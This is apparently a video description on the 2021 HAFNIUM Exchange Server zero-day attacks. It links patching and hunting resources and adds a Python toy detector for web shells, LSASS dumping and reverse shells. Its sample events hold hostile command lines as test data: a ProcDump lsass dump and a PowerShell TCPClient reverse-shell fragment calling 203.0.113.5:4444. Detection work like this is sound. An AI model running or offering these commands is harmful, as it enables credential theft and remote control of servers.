
HAFNIUM Exchange Server 0-Day Exploits

***Please read the documentation in the links below for more info on remediation.*** Let’s talk about the Exchange Server 0-day exploits announced on March 2, 2021. I’ll cover what the threat is, the vulnerabilities, patching, and using Microsoft Defender for Endpoint and Azure Sentinel for detection and remediation.

Table of Contents:
00:00:00 Intro
00:00:30 Overview
00:02:30 Who?
00:03:30 Technical Details
00:05:26 Attack Details
00:09:00 Detection and Mitigation

Ghost in the shell: Investigating web shell attacks
https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/
HAFNIUM targeting Exchange Servers with 0-day exploits – Microsoft Security – https://lnkd.in/gcRFAMB
New nation-state cyberattacks – https://lnkd.in/gvckFkY
**new** blog with IOCs and patching guidance https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020
HAFNIUM targeting Exchange Servers with 0-day exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Released: March 2021 Exchange Server Security Updates https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901
Exchange Server Security Update FAQ https://webcastdiag864.blob.core.windows.net/2021presentationdecks/March%202021%20Exchange%20Server%20Security%20Update%20-%20v1.2%20-%20EN.pdf
More FAQ on Issues w/ Update https://docs.microsoft.com/en-us/exchange/troubleshoot/client-connectivity/exchange-security-update-issues
Defending Exchange servers under attack https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/
Web shell attacks continue to rise https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/
ProcDump: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
LSASS: https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
Dept of Homeland Security Directive: https://cyber.dhs.gov/ed/21-02/
Reverse shell loaded using Nishang Invoke-PowerShellTcpOneLine technique https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/reverse-shell-nishang.md
Procdump dumping LSASS credentials https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Credential%20Access/procdump-lsass-credentials.md#procdump-dumping-lsass-credentials
7-ZIP used by attackers to prepare data for exfiltration https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exfiltration/7-zip-prep-for-exfiltration.md
Exchange PowerShell snap-in being loaded https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exfiltration/exchange-powershell-snapin-loaded.md
Powercat exploitation tool downloaded https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/powercat-download.md
Exchange vulnerability launching subprocesses through UMWorkerProcess https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/umworkerprocess-unusual-subprocess-activity.md
Exchange vulnerability creating web shells via UMWorkerProcess https://github.com/martyav/Microsoft-threat-protection-Hunting-Queries/blob/298c96f625612debfb561bb66d2c0030cc304a83/Execution/umworkerprocess-creating-webshell.md
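The hunting queries linked above describe four post-exploitation behaviours worth checking for on an Exchange server: UMWorkerProcess spawning an unexpected child process, UMWorkerProcess writing a web shell into a web-served folder, ProcDump being pointed at lsass, and a PowerShell command line carrying the Nishang Invoke-PowerShellTcpOneLine reverse-shell pattern. The following is an added example, not code from the video or from Microsoft's query repository: it expresses the idea behind those four queries as plain Python predicates and runs them over a handful of constructed events whose field names mirror the Defender advanced-hunting tables (DeviceProcessEvents / DeviceFileEvents). The allow-list of expected UMWorkerProcess children, the extension list, and the exact substrings matched are assumptions chosen for illustration, not copied from the linked KQL, and the sample events are made up.

```python
"""Toy detection pass over constructed Defender-style process/file events.

Added example, not part of the original video description and not the
Microsoft hunting queries themselves.  Field names mirror the advanced-hunting
schema; the allow-list, extension list and matched substrings are assumptions.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Event:
    table: str                 # "DeviceProcessEvents" or "DeviceFileEvents"
    initiating_process: str    # parent process image name
    file_name: str             # child image (process event) or written file (file event)
    command_line: str = ""     # child command line (process events only)
    folder_path: str = ""      # directory of the written file (file events only)


# Assumption: the only children UMWorkerProcess.exe legitimately spawns on a
# healthy Exchange server are the Windows error-reporting helpers.
EXPECTED_UM_CHILDREN = {"wermgr.exe", "werfault.exe"}

# Assumption: script extensions IIS would execute if dropped under wwwroot.
WEBSHELL_EXTS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")


def um_unusual_child(e: Event) -> bool:
    """UMWorkerProcess launching a subprocess that is not an error-reporting helper."""
    return (e.table == "DeviceProcessEvents"
            and e.initiating_process.lower() == "umworkerprocess.exe"
            and e.file_name.lower() not in EXPECTED_UM_CHILDREN)


def um_webshell_written(e: Event) -> bool:
    """UMWorkerProcess writing a server-executable script (web shell drop)."""
    return (e.table == "DeviceFileEvents"
            and e.initiating_process.lower() == "umworkerprocess.exe"
            and e.file_name.lower().endswith(WEBSHELL_EXTS))


def procdump_lsass(e: Event) -> bool:
    """ProcDump invoked with lsass on its command line (credential dumping)."""
    return (e.table == "DeviceProcessEvents"
            and e.file_name.lower() in {"procdump.exe", "procdump64.exe"}
            and "lsass" in e.command_line.lower())


def nishang_reverse_shell(e: Event) -> bool:
    """PowerShell command line carrying the Invoke-PowerShellTcpOneLine pattern."""
    return (e.table == "DeviceProcessEvents"
            and e.file_name.lower() in {"powershell.exe", "pwsh.exe"}
            and "System.Net.Sockets.TCPClient" in e.command_line
            and "GetStream" in e.command_line)


RULES: Dict[str, Callable[[Event], bool]] = {
    "UMWorkerProcess unusual subprocess": um_unusual_child,
    "UMWorkerProcess creating web shell": um_webshell_written,
    "ProcDump dumping LSASS": procdump_lsass,
    "Nishang reverse shell": nishang_reverse_shell,
}


def evaluate(events: List[Event]) -> List[Dict[str, str]]:
    """Return one hit per (event, rule) pair that fires, in input order."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append({"rule": name, "process": e.initiating_process,
                             "file": e.file_name})
    return hits


# Constructed sample events (not real telemetry); comments mark the expected verdict.
SAMPLE_EVENTS = [
    Event("DeviceProcessEvents", "UMWorkerProcess.exe", "werfault.exe",
          "werfault.exe -u -p 4321"),                                               # benign
    Event("DeviceProcessEvents", "UMWorkerProcess.exe", "cmd.exe",
          "cmd.exe /c whoami"),                                                     # hit
    Event("DeviceFileEvents", "UMWorkerProcess.exe", "shell.aspx",
          folder_path=r"C:\inetpub\wwwroot\aspnet_client\system_web"),              # hit
    Event("DeviceFileEvents", "UMWorkerProcess.exe", "CacheCleanup.bin",
          folder_path=r"C:\Program Files\Microsoft\Exchange Server\V15\UnifiedMessaging\temp"),  # benign
    Event("DeviceProcessEvents", "cmd.exe", "procdump64.exe",
          r"procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmp"),      # hit
    Event("DeviceProcessEvents", "w3wp.exe", "powershell.exe",
          "powershell -nop -c \"$c=New-Object System.Net.Sockets.TCPClient('203.0.113.5',4444);"
          "$s=$c.GetStream();[byte[]]$b=0..65535|%{0}\""),                          # hit
    Event("DeviceProcessEvents", "explorer.exe", "powershell.exe",
          "powershell -File Get-Mailbox.ps1"),                                      # benign
]

if __name__ == "__main__":
    for h in evaluate(SAMPLE_EVENTS):
        print(f"{h['rule']:36s} {h['process']} -> {h['file']}")
```

The predicates are deliberately narrow: the UMWorkerProcess rules key on the parent process rather than on any particular payload, which is what makes them useful against the web-shell variants seen after the initial disclosure, while the ProcDump and reverse-shell rules are string matches that an attacker can trivially evade by renaming the binary or obfuscating the one-liner, so they belong in a hunting pass rather than as the only alert.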

Note: The views and expressions on my videos do not represent those of my employer and are strictly my own.

All content provided on this channel is for informational purposes only. The owner of this channel makes no representations as to the accuracy or completeness of any information on this site or found by following any link on this channel.

The owner of this channel will not be liable for any errors or omissions in this information nor for the availability of this information. The owner will not be liable for any losses, injuries, or damages from the display or use of this information.

These terms and conditions are subject to change at any time with or without notice.


Alice AUSTIN

Alice AUSTIN is studying Cisco Systems Engineering. He has a passion for both hardware and software and writes articles and reviews for many IT websites.
